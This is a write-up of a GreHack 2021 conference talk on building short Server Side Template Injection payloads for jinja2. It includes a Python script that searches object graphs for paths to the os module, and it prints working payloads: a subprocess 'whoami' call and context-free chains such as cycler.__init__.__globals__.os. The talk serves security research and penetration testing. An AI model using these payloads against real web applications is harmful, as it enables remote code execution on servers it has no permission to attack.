GreHack 2021 - Optimizing Server Side Template Injections payloads for jinja2

November 19, 2021 10-minute read

Table of contents :

Introduction

When attacking Python-based web applications, we often need to find a way to execute commands on the server and escape from the application context. In order to get access to the underlying Python backend of a web application, an attacker can exploit common vulnerabilities such as Server Side Template Injection (SSTI) or Code Injections (CI) but how can we escape from this context? In this paper, I present a general approach to solve this problem by exploring python modules and python objects to find paths to high value targets, such as the os module or built-in functions. I will then use this technique to create the shortest payloads to access the os module in Python’s jinja2 template engine.

Recorded talk (MP4) : GreHack_2021_-_Optimizing_Server_Side_Template_Injections_payloads_for_jinja2.mp4
Paper (PDF) : GreHack_2021_-_Optimizing_Server_Side_Template_Injections_payloads_for_jinja2 paper.pdf
Slides (PDF) : GreHack_2021_-_Optimizing_Server_Side_Template_Injections_payloads_for_jinja2 slides.pdf
Live talk on YouTube : https://www.youtube.com/watch?v=2dS34u3T-80&t=25425s

Server Side Template Injections

Server Side Template Injections (SSTI) vulnerabilities can happen when an attacker can modify the template code before it being rendered by the template engine. This can happen in a lot of ways, by mixing format strings and templates, by obtaining a write access to the template files, by a file upload vulnerability …

When an attacker finds a Server Side Template Injection, he will try to inject template code to exploit the template engine to gain access to the underlying machine and achieve Remote Code Execution (RCE).

Finding a path between two modules

Firstly, let’s see what a path from a module to another looks like. With a little bit of research, code review and testing, we can find a path to the os module from the jinja2 module by hand. This is really long as we often need to read the source code of the module to move forward. We can test this path and see that we can access the module os from the module jinja2:

>>> import jinja2
>>> jinja2.bccache.tempfile._os
<module 'os' from '/usr/lib/python3.8/os.py'>
>>>

Python internals

In Python, most variables are actually objects. Python classes’ and objects’ have very interesting internal functions, whose names starts with two underscores __. Some of these internal functions are called when the object is converted to a type ('__bool__', '__float__', '__repr__', '__dict__' ...) and some of them are used in comparisons ('__eq__', '__ge__', '__gt__', '__le__', '__lt__','__ne__', '__neg__', ...). We can list all of the attributes (functions, internal functions, variables) of a Python object through the dir() function. Here is an example of the attributes of an int object:

>>> dir(int(0))
['__abs__', '__add__', '__and__', '__bool__', '__ceil__', '__class__', '__delattr__', '__dir__', '__divmod__', '__doc__', '__eq__', '__float__', '__floor__', '__floordiv__', '__format__', '__ge__', '__getattribute__', '__getnewargs__', '__gt__', '__hash__', '__index__', '__init__', '__init_subclass__', '__int__', '__invert__', '__le__', '__lshift__', '__lt__', '__mod__', '__mul__', '__ne__', '__neg__', '__new__', '__or__', '__pos__', '__pow__', '__radd__', '__rand__', '__rdivmod__', '__reduce__', '__reduce_ex__', '__repr__', '__rfloordiv__', '__rlshift__', '__rmod__', '__rmul__', '__ror__', '__round__', '__rpow__', '__rrshift__', '__rshift__', '__rsub__', '__rtruediv__', '__rxor__', '__setattr__', '__sizeof__', '__str__', '__sub__', '__subclasshook__', '__truediv__', '__trunc__', '__xor__', 'as_integer_ratio', 'bit_length', 'conjugate', 'denominator', 'from_bytes', 'imag', 'numerator', 'real', 'to_bytes']
>>>

As we can see, there are many attributes to this object, most of them being internal functions. These functions are called when casting objects, for example calling str(int(17)) would call the internal __repr__ function like this: int(17).__repr__().

>>> str(int(17))
'17'
>>> int(17).__repr__()
'17'
>>>

From these functions and attributes, we can access other attributes, such as other functions, variables or sub-modules. Here is an example of sub-attributes found in the previous int(0) object:

>>> dir(int(0).__init__)
['__call__', '__class__', '__delattr__', '__dir__', '__doc__', '__eq__', '__format__', '__ge__', '__getattribute__', '__gt__', '__hash__', '__init__', '__init_subclass__', '__le__', '__lt__', '__name__', '__ne__', '__new__', '__objclass__', '__qualname__', '__reduce__', '__reduce_ex__', '__repr__', '__self__', '__setattr__', '__sizeof__', '__str__', '__subclasshook__', '__text_signature__']

All of these functions can be chained to access one object from another. This is the core concept that most payloads use in Server Side Template Injections (SSTI) exploits today, like this one:

{{ ''.__class__.mro()[1].__subclasses__()[396]('whoami', shell=True, stdout=-1).communicate()[0].strip() }}

This type of payloads can cause various problems because it is highly context dependent. Indeed the values of the indexes in "...__class__.mro()[1].__subclasses__()[396]..." can vary depending on the version of jinja2 and the modules used inside the application.

We can find one path from the module jinja2 to the module os by hand, but we simply cannot test every possible path by hand. So, what is next ?

Breadth first search in Python objects

In order to create a general algorithm to explore python objects and extract high value targets for exploits, we first need to define what high value targets we want to find. We will consider modules and built-in functions as priority targets, as they would constitute the basis for a successful exploitation. These two elements are represented as strings by the __repr__ function as follows:

Modules: Represented by strings like <module 'os' from '/usr/lib/python3.8/os.py'>
built-in functions: Represented by strings like <built-in function open>

The first approach to this problem would be to write a recursive function performing a breadth-first search limited to a maximum depth. This function will retrieve all the sub-attributes of an object, and recursively explore them as well.

def find_path_to_modules(obj, found={}, path=[], depth=0, maxdepth=3):
    if "modules" not in found.keys():
        found["modules"] = {}
    if depth < maxdepth:
        for subkey in dir(obj):
            try:
                try:
                    subobj = eval("obj.%s" % subkey, {'obj':obj})
                except SyntaxError as e:
                    continue
                if str(subobj).startswith("<module '"):
                    modulename = str(subobj).split("<module '")[1].split("'")[0]
                    print("\r[>] Found module '%s' at %s" % (modulename, '.'.join(path+[subkey])))
                    if modulename not in found["modules"].keys():
                        found["modules"][modulename] = []
                    found["modules"][modulename].append(found["modules"][modulename] + ['.'.join(path+[subkey])])
                # Explore further
                foundmodules = find_path_to_modules(subobj, found=found, path=path+[subkey], depth=(depth+1), maxdepth=maxdepth)
            except AttributeError as e:
                pass
    return found

With this first approach to the problem, we have two issues:

Cyclic traps: When exploring a sub attribute of an object referring to itself or one of its parents, we will fall in an infinite loop.
Long exploration time: During the breadth-first search, we will encounter a lot of objects, and many of them more than once. This will result in a massive loss of time while exploring multiple times the same objects.

Preventing cyclic traps and optimization

In order to prevent cyclic traps, we need to keep track of the objects we already explored. To do this, we will create a list containing the id of each explored object. The id function returns the address of the object in memory (in CPython implementations), this ensures that the objects are different if their id() differs.

General algorithm to find modules from a Python object

The general algorithm we will use is a recursive function performing a breadth-first search limited to a maximum depth. This function will retrieve all the sub-attributes of an object, and recursively explore them as well. At each step, it will store the id() of the object to prevent falling into cyclic traps.

def find_path_to_modules(obj, found={}, path=[], knownids=[], depth=0, maxdepth=3, verbose=False):
    if "modules" not in found.keys(): found["modules"] = {}
    if depth < maxdepth:
        for subkey in dir(obj):
            if verbose == True:
                print("\r\x1b[2K%s" % '.'.join(path+[subkey]), end="")
            if type(subkey) in [bool]:
                continue
            try:
                try:
                    subobj = eval("obj.%s" % subkey, {'obj':obj})
                except SyntaxError as e:
                    continue
                if str(subobj).startswith("<module '"):
                    modulename = str(subobj).split("<module '")[1].split("'")[0]
                    print("\r[>] Found module '%s' at %s" % (modulename, '.'.join(path+[subkey])))
                    if modulename not in found["modules"].keys():
                        found["modules"][modulename] = []
                    found["modules"][modulename] = shorten_module_paths(
                        path[0],
                        modulename,
                        found["modules"][modulename] + ['.'.join(path+[subkey])]
                    )
                # Explore further
                if id(subobj) not in knownids:
                    knownids.append(id(subobj))
                    foundmodules = find_path_to_modules(
                        subobj,
                        found=found,
                        path=path+[subkey],
                        depth=(depth+1),
                        maxdepth=maxdepth,
                        verbose=verbose
                    )
            except AttributeError as e:
                pass
    return found

Constructing payloads for jinja2

The `TemplateReference` object in jinja2

In jinja2 templates, we can use the TemplateReference object to reuse code blocks from the template. For example, to avoid rewriting the title everywhere in the template, we can define the title in a {% block title %} block and retrieve it with {{ self.title() }} later:

>>> msg = jinja2.Template("""
... <title>{% block title %}This is a title{% endblock %}</title>
... <h1>{{ self.title() }}</h1>
... """).render()
>>> print(msg)
<title>This is a title</title>
<h1>This is a title</h1>
>>>

The access to the TemplateReference object is context-free and it comes with no requirements except being in a jinja2 Template. This is exactly where we would be able to inject code if we managed to get a Server Side Template Injection (SSTI) on a web application. We can directly have access to the TemplateReference object through a simple {{ self }} in a template:

>>> jinja2.Template("My name is {{ self }}").render()
'My name is <TemplateReference None>'
>>>

`TemplateReference` object to `os` module

Using the general algorithm described above on jinja2 as the starting point for the search, we get very interesting results for all the paths to the os module:

{
  "modules": {
    ...
    "os": [
      "jinja2.utils.os",
      "jinja2.bccache.tempfile._os",
      "jinja2.bccache.tempfile._shutil.os",
      "jinja2.bccache.fnmatch.os",
      "jinja2.loaders.os",
      "jinja2.environment.os",
      "jinja2.filters.random._os",
      "jinja2.bccache.os"
    ]
  }
  ...
}

This is all the paths we can reach the os module from the jinja2 module. Now, we will look at the TemplateReference object to see what variables we can use. We can see there is a variable that stands out, the _TemplateReference__context}:

>>> import jinja2
>>> jinja2.Template("My name is {{ f(self) }}").render(f=dir)
"My name is ['_TemplateReference__context', '__class__', '__delattr__', '__dict__', '__dir__', '__doc__', '__eq__', '__format__', '__ge__', '__getattribute__', '__getitem__', '__gt__', '__hash__', '__init__', '__init_subclass__', '__le__', '__lt__', '__module__', '__ne__', '__new__', '__reduce__', '__reduce_ex__', '__repr__', '__setattr__', '__sizeof__', '__str__', '__subclasshook__', '__weakref__']"

Now, if we print this object, we get a dictionary with many values:

>>> import jinja2
>>> jinja2.Template("My name is {{ self._TemplateReference__context }}").render(f=dir)
"My name is <Context {'range': <class 'range'>, 'dict': <class 'dict'>, 'lipsum': <function generate_lorem_ipsum at 0x7f9a1cb0a0d0>, 'cycler': <class 'jinja2.utils.Cycler'>, 'joiner': <class 'jinja2.utils.Joiner'>, 'namespace': <class 'jinja2.utils.Namespace'>, 'f': <built-in function dir>} of None>"

This {{ self._TemplateReference__context }} is very interesting because it gives us access to the following classes:

jinja2.utils.Cycler
jinja2.utils.Joiner
jinja2.utils.Namespace

As we have seen before, we can access the os module from jinja2 at the path jinja2.utils.os. Therefore, all we need to access os from the TemplateReference object is to access the global variables of one of the classes Cycler, Joiner, Namespace.

To do this, it’s really simple ! We first need to access the class constructor:

>>> import jinja2
>>> jinja2.Template("My name is {{ self._TemplateReference__context.cycler.__init__ }}").render()
'My name is <function Cycler.__init__ at 0x7f696dd06700>'

Then access the class constructor global variables (corresponding to the global variables declared in utils.py inside jinja2):

>>> import jinja2
>>> jinja2.Template("My name is {{ self._TemplateReference__context.cycler.__init__.__globals__ }}").render()
'My name is {\'__name__\': \'jinja2.utils\', \'__doc__\': None, \'__package__\': \'jinja2\', ... ... \'os\': <module \'os\' from \'/usr/lib/python3.8/os.py\'>, ... ..., \'Cycler\': <class \'jinja2.utils.Cycler\'>, \'Joiner\': <class \'jinja2.utils.Joiner\'>, \'Namespace\': <class \'jinja2.utils.Namespace\'>, \'_\': <function _ at 0x7f696dd06670>, \'have_async_gen\': True, \'soft_unicode\': <function soft_unicode at 0x7f696dd06ca0>}'

And finally, we can access the os module !

>>> import jinja2
>>> jinja2.Template("My name is {{ self._TemplateReference__context.cycler.__init__.__globals__.os }}").render()

Context-free payload for Remote Code Execution in jinja2

We now have three context-free payloads that can be used to access the os module from the jinja2 module.

{{ self._TemplateReference__context.cycler.__init__.__globals__.os }}

{{ self._TemplateReference__context.joiner.__init__.__globals__.os }}

{{ self._TemplateReference__context.namespace.__init__.__globals__.os }}

Let’s render a small template to check if it works:

>>> import jinja2
>>> jinja2.Template("My name is {{ self._TemplateReference__context.cycler.__init__.__globals__.os }}").render()
"My name is <module 'os' from '/usr/lib/python3.8/os.py'>

These payloads gives us a new, quicker way to access to the os module in Server Side Template Injection attacks. This will be really useful in bug bounties and penetration tests !

Further optimization

Now that we have completely context-free payloads, we can add a final optimization to them. To construct these payloads, we explored the python object tree from the TemplateReference object declared within jinja2 templates as {{ self }}. This object holds all the variables declared inside the template, therefore we could simplify our payloads by removing the self._TemplateReference__context as we can access directly to joiner, cycler or namespace from within the template!

Therefore the final context-free payloads to access the os module in jinja2 templates are:

{{ cycler.__init__.__globals__.os }}

{{ joiner.__init__.__globals__.os }}

{{ namespace.__init__.__globals__.os }}

Conclusion

In Server Side Template Injection (SSTI) vulnerabilities, we can inject template code in the web application, which will then be reflected in the template and executed inside the application context. In order to escape this context and gain Remote Code Execution on the server, we often need to find a way to import the os Python module.

In order to find generic ways to access the os module, we studied how Python objects and internal functions work in order to design an algorithm capable of exploring Python objects looking for modules, without falling into cyclic traps. With this general algorithm, we were able to construct context-free payloads that can be used to achieve Remote Code Execution (RCE) when an attacker has a SSTI in jinja2. Other payloads can also be created to exploit other template engines, such as Mako for example.